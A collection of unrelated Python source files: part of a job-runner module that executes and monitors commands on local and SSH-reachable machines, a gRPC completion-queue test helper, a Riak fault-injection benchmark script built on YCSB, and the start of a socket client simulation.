timeout : apply a timeout to the command
timeout_date : timeout the job at the given date (epoch time in seconds)
machine : run the command on a remote machine
logdir : for remote commands, place the remote log file here
sharedlog : for remote commands, set this to True if the remote
machine can write its log file to the local log file
location (usually they share NFS mounts); in this case,
the 'logdir' option is not used
waitforjobid : only run this new job after the given jobid completes
sshexe : for remote commands, use this as the ssh program
connection_attempts : for remote commands, limit the number of attempts
to connect to the remote machine
poll_interval : For local jobs with a timeout, this is the sleep time
in seconds between checks for subprocess completion.
For jobs run on remote machines, this is the time in
seconds between log file pulls and the job completion
check
The keyword arguments are passed to the underlying Job object.
"""
return JobRunner.inst.submit_job( *args, **kwargs )
def poll_job( jobid ):
"""
Returns True if the 'jobid' completed. If the 'jobid' is unknown, an
exception is raised.
"""
return JobRunner.inst.isDone( jobid )
def wait_job( jobid, **kwargs ):
"""
Waits for the job to complete and returns a Job object. If the 'jobid'
does not exist, an exception is raised.
If the job is already complete, this function just returns the underlying
Job object. Thus, this function can be used to obtain the Job object
for any given job id.
The optional keyword argument 'poll_interval' can be used to specify the
sleep time in seconds between polls.
"""
return JobRunner.inst.complete( jobid, **kwargs )
def wait_all( *jobids, **kwargs ):
"""
Waits for each job to complete and returns the list of completed Job
objects. If no 'jobids' are given, all background jobs are waited upon.
The optional keyword argument 'poll_interval' can be used to specify the
sleep time in seconds between polls.
"""
return JobRunner.inst.complete_all( *jobids, **kwargs )
def run_wait( *args, **kwargs ):
"""
Starts a job in the background, waits on the job, and returns the exit
status. The arguments are the same as for run_job().
The optional keyword argument 'poll_interval' can be used to specify the
sleep time in seconds between polls.
"""
jid = JobRunner.inst.submit_job( *args, **kwargs )
jb = wait_job( jid, **kwargs )
x = jb.get( 'exit', None )
return x
###########################################################################
class Job:
def __init__(self, **kwargs):
"""
"""
self.lock = threading.Lock()
self.attrD = {}
for n,v in kwargs.items():
self.set( n, v )
# when the job is running, this is a threading.Thread() instance
self.runthread = None
self.state = 'setup'
def getState(self):
"""
Returns the state of the Job as a string, one of
setup : job setup/construction
ready : ready to be run (finalize was called)
run : thread has been started
done : thread was run and now finished
"""
return self.state
def __bool__(self):
"""
This allows a Job class instance to be cast (coerced) to True/False.
That is, an instance will evaluate to True if the job exited and the
exit status is zero. If the job has not been run yet, or is still
running, or the exit status is non-zero, then it evaluates to False.
"""
x = self.get( 'exit', 1 )
if type(x) == type(2) and x == 0:
return True
return False
__nonzero__ = __bool__
def has(self, attr_name):
"""
Returns True if the given attribute name is defined.
"""
self.lock.acquire()
try:
v = ( attr_name in self.attrD )
finally:
self.lock.release()
return v
def get(self, attr_name, *default):
"""
Get an attribute name. If a default is given and the attribute name
is not set, then the default is returned.
"""
self.lock.acquire()
try:
if len(default) > 0:
v = self.attrD.get( attr_name, default[0] )
else:
v = self.attrD[attr_name]
finally:
self.lock.release()
return v
def clear(self, attr_name):
"""
Removes the attribute from the Job dict.
"""
assert attr_name and attr_name == attr_name.strip()
self.lock.acquire()
try:
if attr_name in self.attrD:
self.attrD.pop( attr_name )
finally:
self.lock.release()
def set(self, attr_name, attr_value):
"""
Set an attribute. The attribute name cannot be empty or contain
spaces at the beginning or end of the string.
Some attribute names have checks applied to their values.
"""
assert attr_name and attr_name == attr_name.strip()
if attr_name in ["name","machine"]:
assert attr_value and attr_value == attr_value.strip(), \
'invalid "'+attr_name+'" value: "'+str(attr_value)+'"'
elif attr_name in ['timeout','timeout_date']:
attr_value = int( attr_value )
elif attr_name == 'poll_interval':
attr_value = int( attr_value )
assert attr_value > 0
elif attr_name == 'sharedlog':
if attr_value: attr_value = True
else: attr_value = False
self.lock.acquire()
try:
self.attrD[attr_name] = attr_value
finally:
self.lock.release()
def date(self):
"""
Returns a formatted date string with no spaces. If a 'date' attribute
is not already set, the current time is used to create the date and
set the 'date' attribute.
"""
if not self.get( 'date', None ):
self.set( 'date', time.strftime( "%a_%b_%d_%Y_%H:%M:%S_%Z" ) )
return self.get( 'date' )
def logname(self):
"""
Returns the log file name for the job (without the directory).
"""
if not self.get( 'logname', None ):
n = self.get( 'name' )
m = self.get( 'machine', None )
if m: n += '-' + m
n += '-' + self.date() + '.log'
self.set( 'logname', n )
return self.get( 'logname' )
def logpath(self):
"""
Returns the remote log file path (directory plus file name).
"""
if not self.get( 'logpath', None ):
logn = self.logname()
cd = self.rundir()
logd = self.get( 'logdir', JobRunner.getDefault( 'logdir', cd ) )
if logd: logf = os.path.join( logd, logn )
else: logf = logn
self.set( 'logpath', logf )
return self.get( 'logpath' )
def rundir(self):
"""
Returns the directory in which the job will run, or None if it is not
specified.
"""
cd = self.get( 'chdir', None )
if cd == None:
cd = JobRunner.getDefault( 'chdir', None )
return cd
def jobid(self):
"""
Returns a tuple that uniquely identifies this job.
"""
return ( self.get( 'name', None ),
self.get( 'machine', None ),
self.date() )
def finalize(self):
"""
Create the launch command. An exception is raised if the job is not
well formed. Returns the job id.
"""
self.jobid()
assert self.has( 'command' )
assert self.logname()
self.state = 'ready'
def start(self):
"""
Start the job execution in a separate thread. Returns without waiting
on the job. The job state is set to "run".
"""
try:
assert self.state == 'ready'
# a local function serves as the thread entry point to run the
# job; exceptions are caught, the 'exc' attribute set, and the
# exception re-raised
def threxec( jb ):
try:
jb.execute()
except:
xt,xv,xtb = sys.exc_info()
xs = ''.join( traceback.format_exception_only( xt, xv ) )
ct = time.ctime()
jb.set( 'exc', '[' + ct + '] ' + xs )
sys.stderr.write( '[' + ct + '] Exception: ' + xs + '\n' )
raise
t = threading.Thread( target=threxec, args=(self,) )
self.runthread = t
t.setDaemon( True ) # so ctrl-C will exit the program
# set the thread name so exceptions include the job id
if hasattr( t, 'setName' ):
t.setName( str( self.jobid() ) )
else:
t.name = str( self.jobid() )
t.start()
self.state = "run"
except:
self.state = "done"
raise
def poll(self):
"""
Tests for job completion. Returns the job state.
"""
if self.state == "run":
t = self.runthread
if hasattr( t, 'is_alive' ):
alive = t.is_alive()
else:
alive = t.isAlive()
if not alive:
t.join()
self.runthread = None
self.state = "done"
return self.state
def wait(self):
"""
Waits for the job to complete (for the underlying job thread to
finish).
"""
if self.state == "run":
self.runthread.join()
self.runthread = None
self.state = "done"
def execute(self):
"""
If the job does not have a 'machine' attribute, the command is run
directly as a subprocess with all output redirected to a log file.
When the command finishes, the exit status is set in the 'exit'
attribute and this function returns.
If the job has a 'machine' attribute, the remotepython.py module is
used to run the command on the remote machine in the background.
Output from the remote command is redirected to a log file, and that
log file is brought back every 'poll_interval' seconds. When the
remote command finishes, the exit status is set in the 'exit'
attribute and this function returns.
"""
self.clear( 'exit' )
mach = self.get( 'machine', None )
if not mach:
self._run_wait()
else:
self._run_remote( mach )
def _compute_timeout(self):
"""
Returns the timeout for the job by first looking for 'timeout' then
'timeout_date'.
"""
if self.has( 'timeout' ):
return self.get( 'timeout' )
if self.has( 'timeout_date' ):
return self.get( 'timeout_date' ) - time.time()
return JobRunner.getDefault( 'timeout' )
def _run_wait(self):
"""
"""
ipoll = self.get( 'poll_interval',
JobRunner.getDefault( 'poll_interval' ) )
timeout = self._compute_timeout()
cmd = self.get( 'command' )
shl = self.get( 'shell', True )
chd = self.rundir()
logn = self.logname()
cwd = os.getcwd()
logfp = open( logn, 'w' )
x = None
try:
if timeout == None:
x = cmd.run( shell=shl,
chdir=chd,
echo="none",
redirect=logfp.fileno(),
raise_on_error=False )
else:
x = cmd.run_timeout( timeout=timeout,
poll_interval=ipoll,
shell=shl,
chdir=chd,
echo="none",
redirect=logfp.fileno(),
raise_on_error=False )
finally:
logfp.close()
self.set( 'exit', x )
def _run_remote(self, mach):
"""
"""
timeout = self._compute_timeout()
cmd = self.get( 'command' )
shl = self.get( 'shell', True )
pycmd,shcmd = cmd.getCommands( shell=shl )
chd = self.rundir()
sshexe = self.get( 'sshexe', JobRunner.getDefault( 'sshexe' ) )
numconn = self.get( 'connection_attempts',
JobRunner.getDefault( 'connection_attempts' ) )
if self.get( 'sharedlog', False ):
remotelogf = os.path.abspath( self.logname() )
else:
remotelogf = self.logpath()
mydir = os.path.dirname( os.path.abspath( __file__ ) )
from pythonproxy import PythonProxy
if sshexe:
rmt = PythonProxy( mach, sshcmd=sshexe )
else:
rmt = PythonProxy( mach )
tprint( 'Connect machine:', mach )
tprint( 'Remote command:', shcmd )
if chd:
tprint( 'Remote dir:', chd )
if timeout != None:
tprint( 'Remote timeout:', timeout )
if self._is_dryrun():
# touch the local log file but do not execute the command
fp = open( self.logname(), 'a' )
fp.close()
self.set( 'exit', 0 )
else:
T = self._connect( rmt, numconn )
if T != None:
sys.stderr.write( '[' + time.ctime() + '] ' + \
'Connect exception for jobid '+str(self.jobid())+'\n' + T[1] )
sys.stderr.flush()
raise Exception( "Could not connect to "+mach )
try:
inf = rmt.timeout(30).get_machine_info()
tprint( 'Remote info:', inf )
rusr = rmt.timeout(30).os.getuid()
rpid = rmt.background_command( pycmd, remotelogf,
chdir=chd,
timeout=timeout )
self._monitor( rmt, rusr, rpid, timeout )
finally:
rmt.shutdown()
def _connect(self, rmtpy, limit=10):
"""
Tries to make a connection to the remote machine. It tries up to
'limit' times, sleeping 2**i seconds between each attempt. Returns
None if a connection was made, otherwise the return value from
capture_traceback().
"""
assert limit > 0
for i in range(limit):
if i > 0:
time.sleep( 2**i )
rtn = None
try:
rmtpy.start( 30 )
rmtpy.timeout(30).send( remote_side_code )
except:
# raise # uncomment this when debugging connections
rtn = capture_traceback( sys.exc_info() )
else:
break
return rtn
def _monitor(self, rmtpy, rusr, rpid, timeout):
"""
"""
ipoll = self.get( 'poll_interval',
JobRunner.getDefault( 'remote_poll_interval' ) )
xinterval = self.get( 'exception_print_interval',
JobRunner.getDefault( 'exception_print_interval' ) )
# let the job start running before attempting to pull the log file
time.sleep(2)
if timeout != None:
timeout = max( 1, timeout+2 )
ipoll = min( ipoll, max( 1, int( 0.45 * timeout ) ) )
logn = self.logname()
logf = self.logpath()
sharedlog = self.get( 'sharedlog', False )
tstart = time.time()
texc1 = tstart
texc2 = tstart
pause = 2
while True:
elapsed = True
try:
if not sharedlog:
self.updateFile( rmtpy, logf, logn )
s = rmtpy.timeout(30).processes( pid=rpid, user=rusr, fields='etime' )
elapsed = s.strip()
# TODO: add a check that the elapsed time agrees
# approximately with the expected elapsed time
# since the job was launched
except:
# raise # uncomment to debug
xs,tb = capture_traceback( sys.exc_info() )
t = time.time()
if t - texc2 > xinterval:
sys.stderr.write( '[' + time.ctime() + '] ' + \
'Warning: exception monitoring jobid ' + \
str( self.jobid() ) + '\n' + tb + \
'Exception ignored; continuing to monitor...\n' )
sys.stderr.flush()
texc2 = t
self.scanExitStatus( logn )
if not elapsed:
# remote process id not found - assume it is done
break
if timeout != None and time.time()-tstart > timeout:
sys.stderr.write( 'Monitor process timed out at ' + \
str( int(time.time()-tstart) ) + ' seconds for jobid ' + \
str( self.jobid() ) + '\n' )
sys.stderr.flush()
# TODO: try to kill the remote process
break
time.sleep( pause )
pause = min( 2*pause, ipoll )
def updateFile(self, rmtpy, logfile, logname):
"""
As 'logfile' on the remote side grows, the new part of the file is
transferred back to the local side and appended to 'logname'.
[May 2020] The incremental transfer algorithm has been removed.
"""
small = int( self.get( 'getlog_small_file_size',
JobRunner.getDefault( 'getlog_small_file_size' ) ) )
chunksize = int( self.get( 'getlog_chunk_size',
JobRunner.getDefault( 'getlog_chunk_size' ) ) )
lcl_sz = -1
if os.path.exists( logname ):
lcl_sz = os.path.getsize( logname )
rmt_sz = rmtpy.timeout(30).file_size( logfile )
if lcl_sz != rmt_sz and rmt_sz >= 0:
rmtpy.session_timeout(10*60)
recv_file( rmtpy, logfile, logname )
rmtpy.session_timeout(None)
def scanExitStatus(self, logname):
"""
Reads the end of the given log file name for "Subcommand exit:" and
if found, the 'exit' attribute of this job is set to the value.
"""
try:
fp = None
sz = os.path.getsize( logname )
fp = open( logname, 'r' )
if sz > 256:
fp.seek( sz-256 )
s = fp.read()
fp.close() ; fp = None
L = s.split( 'Subcommand exit:' )
if len(L) > 1:
x = L[-1].split( '\n' )[0].strip()
if x.lower() == 'none':
# remote process timed out
x = None
else:
try:
ix = int( x )
except:
# leave exit value as a string
pass
else:
# process exited normally
x = ix
self.set( 'exit', x )
except:
if fp != None:
fp.close()
def _is_dryrun(self):
"""
If the environment defines COMMAND_DRYRUN to an empty string or to the
value "1", then this function returns True, which means this is a dry
run and the job command should not be executed.
If COMMAND_DRYRUN is set to a nonempty string, it should be a list of
program basenames, where the list separator is a forward slash, "/".
If the basename of the job command program is in the list, then it is
allowed to run (False is returned). Otherwise True is returned and the
command is not run. For example,
COMMAND_DRYRUN="scriptname.py/jobname"
"""
v = os.environ.get( 'COMMAND_DRYRUN', None )
if v != None:
if v and v != "1":
# use the job name, which is 'jobname' or basename of program
n = self.get( 'name' )
L = v.split('/')
if n in L:
return False
return True
return False
#########################################################################
class JobRunner:
def __init__(self):
"""
"""
self.jobdb = {}
self.waiting = {}
self.defaults = {
'poll_interval': 15,
'remote_poll_interval': 5*60,
'exception_print_interval': 15*60,
'timeout': None,
'chdir': None,
'sshexe': None,
'connection_attempts': 10,
'getlog_small_file_size': 5*1024,
'getlog_chunk_size': 512,
}
inst = None # a singleton JobRunner instance (set below)
@staticmethod
def seDefault( attr_name, attr_value ):
"""
Set default value for a job attribute.
"""
D = JobRunner.inst.defaults
D[ attr_name ] = attr_value
@staticmethod
def getDefault( attr_name, *args ):
"""
Get the default value for a job attribute.
"""
D = JobRunner.inst.defaults
if len(args) > 0:
return D.get( attr_name, args[0] )
return D[ attr_name ]
def submit_job(self, *args, **kwargs ):
"""
Given the command arguments and keyword attributes, a Job object is
constructed and started in the background. If the job depends on
another job completing first, then it is placed in the "waiting" list
instead of being run.
The job id is returned. The state of the job will be one of
setup : an error during job setup occurred
ready : the job is waiting on another job before being run
run : the job was run in the background (in a thread)
"""
# while here, we might as well check for job completion
self.poll_jobs()
print3()
tprint( 'Submit:', args, kwargs )
print3( ''.join( traceback.format_list(
traceback.extract_stack()[:-1] ) ).rstrip() )
jb = Job()
try:
assert len(args) > 0, "empty or no command given"
if len(args) == 1:
if isinstance( args[0], command.Command ):
cmdobj = args[0]
else:
cmdobj = command.Command( args[0] )
else:
cmdobj = command.Command().arg( *args )
if 'name' in kwargs:
jobname = kwargs['name']
else:
cmd,scmd = cmdobj.getCommands( kwargs.get( 'shell', True ) )
if type(cmd) == type(''):
jobname = os.path.basename( cmd.strip().split()[0] )
else:
jobname = os.path.basename( cmd[0] )
jb.set( 'name', jobname )
jb.set( 'command', cmdobj )
if 'shell' in kwargs:
jb.set( 'shell', kwargs['shell'] )
for n,v in kwargs.items():
jb.set( n, v )
if 'waitforjobid' in kwargs and kwargs['waitforjobid']:
# check validity of waitfor job id before finalizing
wjid = kwargs['waitforjobid']
assert wjid in self.jobdb, \
"waitforjobid not in existing job list: "+str(wjid)
jb.finalize()
self.jobdb[ jb.jobid() ] = jb
except:
# treat exceptions as a job failure
xs,tb = capture_traceback( sys.exc_info() )
jb.set( 'exc', '[' + time.ctime() + '] ' + xs )
sys.stderr.write( '['+time.ctime() +'] ' + \
'Exception preparing job '+str(args)+' '+str(kwargs)+'\n' + tb )
sys.stderr.flush()
# make sure the job is in the database (as a failure)
self.jobdb[ jb.jobid() ] = jb
else:
if 'waitforjobid' in kwargs and kwargs['waitforjobid']:
wjid = kwargs['waitforjobid']
tprint( 'WaitFor:', jb.jobid(), 'waiting on', wjid )
self.waiting[ jb.jobid() ] = ( jb, wjid )
else:
self.launch_job( jb )
# this just ensures that the next job will have a unique date stamp
time.sleep(1)
return jb.jobid()
def launch_job(self, jb):
"""
A helper function that launches a job and returns without waiting.
The underlying command is executed in a thread. The job state
becomes "run".
"""
assert jb.getState() == "ready"
try:
cmd = jb.get( 'command' )
shl = jb.get( 'shell', True )
tprint( 'RunJob:', cmd.asShellString( shell=shl ) )
tprint( 'JobID:', jb.jobid() )
tprint( 'LogFile:', os.path.abspath(jb.logname()) )
m = jb.get( 'machine', None )
if m: tprint( 'Machine:', m )
cd = jb.rundir()
if cd: tprint( 'Directory:', cd )
# run the job in a thread and return without waiting
jb.start()
except:
xs,tb = capture_traceback( sys.exc_info() )
jb.set( 'exc', '[' + time.ctime() + '] ' + xs )
sys.stderr.write( '['+time.ctime() +'] ' + \
'Exception running jobid '+str( jb.jobid() )+'\n' + tb )
sys.stderr.flush()
def isDone(self, jobid):
"""
Tests for job completion. Returns True if the underlying job thread
has completed.
"""
self.poll_jobs()
job = self.jobdb[ jobid ]
st = job.getState()
return st == 'setup' or st == "done"
def complete(self, jobid, **kwargs):
"""
Waits for the job to complete then returns the Job object. There is
no harm in calling this function if the job is already complete.
"""
job = self.jobdb[ jobid ]
ipoll = kwargs.get( 'poll_interval',
JobRunner.getDefault( 'poll_interval' ) )
while True:
self.poll_jobs()
st = job.getState()
if st == "setup" or st == "done":
break
time.sleep( ipoll )
return job
def poll_jobs(self):
"""
Polls all running jobs, then launches pending jobs if the job they
are waiting on has completed.
"""
for jid,jb in self.jobdb.items():
# this is the only place jobs move from "run" to "done"
if jb.getState() == 'run':
if jb.poll() == 'done':
print3()
tprint( 'JobDone:', 'jobid='+str(jb.jobid()),
'exit='+str(jb.get('exit','')).strip(),
'exc='+str(jb.get('exc','')).strip() )
D = {}
for jid,T in self.waiting.items():
jb,waitjid = T
waitstate = self.jobdb[waitjid].getState()
if waitstate == 'setup' or waitstate == 'done':
self.launch_job( jb )
else:
D[jid] = T
self.waiting = D
def complete_all(self, *jobids, **kwargs):
"""
Repeated poll of each job id, until all complete. Returns a list
of Jobs corresponding to the job ids. If no job ids are given, then
all running and waiting jobs are completed.
"""
ipoll = kwargs.get( 'poll_interval',
JobRunner.getDefault( 'poll_interval' ) )
if len(jobids) == 0:
jobids = []
for jid,jb in self.jobdb.items():
st = jb.getState()
if st == 'ready' or st == 'run':
jobids.append( jid )
jobD = {}
while True:
self.poll_jobs()
for jid in jobids:
jb = self.jobdb[jid]
st = jb.getState()
if st == 'setup' or st == 'done':
jobD[jid] = jb
if len(jobD) == len(jobids):
break
time.sleep( ipoll )
return [ jobD[jid] for jid in jobids ]
# construct the JobRunner singleton instance
JobRunner.inst = JobRunner()
def recv_file( rmt, rf, wf ):
""
stats = rmt.get_file_stats( rf )
fp = open( wf, 'wt' )
fp.write( rmt.readfile( rf ) )
fp.close()
set_file_stats( wf, stats )
def set_file_stats( filename, stats ):
""
mtime,atime,fmode = stats
os.utime( filename, (atime,mtime) )
os.chmod( filename, fmode )
remote_side_code = """
import os, sys
import traceback
import stat
import subprocess
import time
#############################################################################
_background_template = '''
import os, sys, time, subprocess, signal
cmd = COMMAND
timeout = TIMEOUT_VALUE
nl=os.linesep
ofp=sys.stdout
ofp.write( "Start Date: " + time.ctime() + nl )
ofp.write( "Parent PID: " + str(os.getpid()) + nl )
ofp.write( "Subcommand: " + str(cmd) + nl )
ofp.write( "Directory : " + os.getcwd() + nl+nl )
ofp.flush()
argD = {}
if type(cmd) == type(''):
argD['shell'] = True
if sys.platform.lower().startswith('win'):
def kill_process( po ):
po.terminate()
else:
# use preexec_fn to put the child into its own process group
# (to more easily kill it and all its children)
argD['preexec_fn'] = lambda: os.setpgid( os.getpid(), os.getpid() )
def kill_process( po ):
# send all processes in the process group a SIGTERM
os.kill( -po.pid, signal.SIGTERM )
# wait for child process to complete
for i in range(10):
x = po.poll()
if x != None:
break
time.sleep(1)
if x == None:
# child did not die - try to force it
os.kill( po.pid, signal.SIGKILL )
time.sleep(1)
po.poll()
t0=time.time()
p = subprocess.Popen( cmd, **argD )
try:
if timeout != None:
while True:
x = p.poll()
if x != None:
break
if time.time() - t0 > timeout:
kill_process(p)
x = None # mark as timed out
break
time.sleep(5)
else:
x = p.wait()
except:
kill_process(p)
raise
ofp.write( nl + "Subcommand exit: " + str(x) + nl )
ofp.write( "Finish Date: " + time.ctime() + nl )
ofp.flush()
'''.lstrip()
def background_command( cmd, redirect, timeout=None, chdir=None ):
"Run command (list or string) in the background and redirect to a file."
pycode = _background_template.replace( 'COMMAND', repr(cmd) )
pycode = pycode.replace( 'TIMEOUT_VALUE', repr(timeout) )
cmdL = [ sys.executable, '-c', pycode ]
if chdir != None:
cwd = os.getcwd()
os.chdir( os.path.expanduser(chdir) )
try:
fpout = open( os.path.expanduser(redirect), 'w' )
try:
fpin = open( os.devnull, 'r' )
except:
fpout.close()
raise
try:
argD = { 'stdin': fpin.fileno(),
'stdout': fpout.fileno(),
'stderr': subprocess.STDOUT }
if not sys.platform.lower().startswith('win'):
# place child in its own process group to help avoid getting
# killed when the parent process exits
argD['preexec_fn'] = lambda: os.setpgid( os.getpid(), os.getpid() )
p = subprocess.Popen( cmdL, **argD )
except:
fpout.close()
fpin.close()
raise
finally:
if chdir != None:
os.chdir( cwd )
fpout.close()
fpin.close()
return p.pid
#############################################################################
def readfile( filename ):
""
with open( filename, 'rt' ) as fp:
content = fp.read()
return content
def get_file_stats( filename ):
""
mtime = os.path.getmtime( filename )
atime = os.path.getatime( filename )
fmode = stat.S_IMODE( os.stat(filename)[stat.ST_MODE] )
return mtime,atime,fmode
def get_machine_info():
"Return user name, system name, network name, and uptime as a string."
usr = os.getuid()
try:
import getpass
usr = getpass.getuser()
except:
pass
rtn = 'user='+usr
L = os.uname()
rtn += ' sysname='+L[0]+' nodename='+L[1]
upt = '?'
try:
x,out = runout( 'uptime' )
upt = out.strip()
except:
pass
rtn += ' uptime='+upt
return rtn
def runout( cmd, include_stderr=False ):
"Run a command and return the exit status & output as a pair."
argD = {}
if type(cmd) == type(''):
argD['shell'] = True
fp = None
argD['stdout'] = subprocess.PIPE
if include_stderr:
argD['stderr'] = subprocess.STDOUT
else:
fp = open( os.devnull, 'w' )
argD['stderr'] = fp.fileno()
try:
p = subprocess.Popen( cmd, **argD )
out,err = p.communicate()
except:
fp.close()
raise
if fp != None:
fp.close()
x = p.returncode
if type(out) != type(''):
out = out.decode() # convert bytes to a string
return x, out
def processes( pid=None, user=None, showall=False, fields=None, noheader=True ):
"The 'fields' defaults to 'user,pid,ppid,etime,pcpu,vsz,args'."
plat = sys.platform.lower()
if fields == None:
fields = 'user,pid,ppid,etime,pcpu,vsz,args'
if plat.startswith( 'darwin' ):
cmd = 'ps -o ' + fields.replace( 'args', 'command' )
elif plat.startswith( 'sunos' ):
cmd = '/usr/bin/ps -o ' + fields
else:
cmd = 'ps -o ' + fields
if pid != None:
cmd += ' -p '+str(pid)
elif user:
cmd += ' -u '+user
elif showall:
cmd += ' -e'
x,out = runout( cmd )
if noheader:
# strip off first non-empty line
out = out.strip() + os.linesep
i = 0
while i < len(out):
if out[i:].startswith( os.linesep ):
out = out[i:].lstrip()
break
i += 1
out = out.strip()
if out:
out += os.linesep
return out
def file_size( filename ):
"Returns the number of bytes in the given file name, or -1 if the file does not exist."
filename = os.path.expanduser( filename )
if os.path.exists( filename ):
return os.path.getsize( filename )
return -1
"""
def capture_traceback( excinfo ):
"""
This should be called in an except block of a try/except, and the argument
should be sys.exc_info(). It extracts and formats the traceback for the
exception. Returns a pair ( the exception string, the full traceback ).
"""
xt,xv,xtb = excinfo
xs = ''.join( traceback.format_exception_only( xt, xv ) )
tb = 'Traceback (most recent call last):\n' + \
''.join( traceback.format_list(
traceback.extract_stack()[:-2] +
traceback.extract_tb( xtb ) ) ) + xs
return xs,tb
def print3( *args ):
"""
Python 2 & 3 compatible print function.
"""
s = ' '.join( [ str(x) for x in args ] )
sys.stdout.write( s + '\n' )
sys.stdout.flush()
def tprint( *args ):
"""
Same as print3 but prefixes with the date.
"""
s = ' '.join( [ str(x) for x in args ] )
sys.stdout.write( '['+time.ctime()+'] ' + s + '\n' )
sys.stdout.flush()
if sys.version_info[0] < 3:
def _BYTES_(s): return s
else:
bytes_type = type( ''.encode() )
def _BYTES_(s):
if type(s) == bytes_type:
return s
return s.encode( 'ascii' )
|
test_utilities.py
|
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import threading
from grpc._cython import cygrpc
class CompletionQueuePollFuture:
def __init__(self, completion_queue, deadline):
def poller_function():
self._event_result = completion_queue.poll(deadline)
self._event_result = None
self._thread = threading.Thread(target=poller_function)
self._thread.start()
def result(self):
self._thread.join()
return self._event_result
|
riak_kill_start.py
|
#!/bin/python
import sys;
import subprocess;
from time import sleep;
from threading import Thread;
from Thesis.ycsbClient.runMultipleYcsbClients import executeCommandOnYcsbNodes;
from Thesis.plot.ParseYcsbTestResults import parseAndPlot;
from Thesis.delete_data.deleteAllRiakData import deleteAllDataInRiak;
from Thesis.util.util import executeCommandOverSsh;
from Thesis.util.ycsbCommands.Commands import getLoadCommand;
from Thesis.util.ycsbCommands.Commands import getRunCommand;
RIAK_BINDING = "riak";
# PATH_YCSB_EXECUTABLE = "/root/YCSB/bin/ycsb";
# RECORD_COUNT = 1000;
# OPERATION_COUNT = 999999999;
# TIMESERIES_GRANULARITY = 2000;
def main():
# Check amount input parameters
if(len(sys.argv) != 8):
printUsageAndExit('Illegal amount of input arguments');
# Retrieve input parameters
IpNodeToBeKilled = sys.argv[1];
ipsInCluster = sys.argv[2].split(',');
runtimeBenchmarkInSeconds = int(sys.argv[3])*60;
killTimeInSeconds = float(sys.argv[4])*60;
startTimeInSeconds = float(sys.argv[5])*60;
pathToWorkloadFile = sys.argv[6];
pathResultFile = sys.argv[7];
# Check validity input parameters
if(runtimeBenchmarkInSeconds <= 0 ):
printUsageAndExit('Illegal runtime of benchmark argument');
if(killTimeInSeconds < 0 or killTimeInSeconds > runtimeBenchmarkInSeconds):
printUsageAndExit('Illegal kill at argument');
if(startTimeInSeconds < 0 or startTimeInSeconds > runtimeBenchmarkInSeconds):
printUsageAndExit('Illegal start at argument');
# Clear database
deleteAllDataInRiak(ipsInCluster);
# Load database
loadCommand = getLoadCommand(RIAK_BINDING, pathToWorkloadFile);
# loadCommand = [PATH_YCSB_EXECUTABLE, 'load', RIAK_BINDING];
# loadCommand.extend(['-P', pathToWorkloadFile]);
# loadCommand.extend(['-p', 'recordcount=' + str(RECORD_COUNT)]);
# loadCommand.extend(['-p', 'operationcount=' + str(OPERATION_COUNT)]);
# loadCommand.extend(['-p', 'measurementtype=timeseries']);
# loadCommand.extend(['-p', 'timeseries.granularity=' + str(TIMESERIES_GRANULARITY), '-s']);
print "Loading database";
exitCode = subprocess.call(loadCommand);
if(exitCode != 0):
raise Exception('Loading database failed');
# Start benchmark
runCommand = getRunCommand(RIAK_BINDING, pathToWorkloadFile, runtimeBenchmarkInSeconds);
# runCommand = [PATH_YCSB_EXECUTABLE, 'run', RIAK_BINDING];
# runCommand.extend(['-P', pathToWorkloadFile]);
# runCommand.extend(['-p', 'recordcount=' + str(RECORD_COUNT)]);
# runCommand.extend(['-p', 'operationcount=' + str(OPERATION_COUNT)]);
# runCommand.extend(['-p', 'measurementtype=timeseries']);
# runCommand.extend(['-p', 'timeseries.granularity=' + str(TIMESERIES_GRANULARITY)]);
# runCommand.extend(['-p', 'maxexecutiontime=' + str(runtimeBenchmarkInSeconds), '-s']);
print "Starting benchmark";
benchmarkThread = Thread(target=executeCommandOnYcsbNodes, args=(runCommand, runCommand, pathResultFile, ['172.16.33.10']));
benchmarkThread.start();
# Stop node at "kill at"
sleep(killTimeInSeconds);
print "Stopping Riak server at " + IpNodeToBeKilled;
executeCommandOverSsh(IpNodeToBeKilled, "su riak -c 'riak stop'");
# Start node at "start at"
sleep(startTimeInSeconds - killTimeInSeconds);
print "Starting Riak server at " + IpNodeToBeKilled;
executeCommandOverSsh(IpNodeToBeKilled, "su riak -c 'riak start'");
# Wait for benchmark to finish and close result file
benchmarkThread.join();
# Plot results
parseAndPlot(pathResultFile);
def printUsageAndExit(errorMessage):
print 'Usage: script <IP node to be killed> <IPs in cluster> <runtime of benchmark (min)> <kill at (min)> <start at (min)> <Path to workload file> <path result file>';
exit();
main();
|
client.py
|
# code to simulate the client
# each client sends a particular request for a size and gets back the best price for that size for each supplier
from os import startfile
import socket
from random import randint
from threading import Thread
from jpype import *
num_clients = 10 # number of clients to be created
server_port = 12345
client_port = 1025
middle_port_client=2345
# connect to a java jdk to get the time in nano seconds
# Can't use python functions as java has different seed for starting time
startJVM("C:/Program Files/Eclipse Adoptium/jdk-17.0.1.12-hotspot/bin/server/jvm.dll", "-ea")
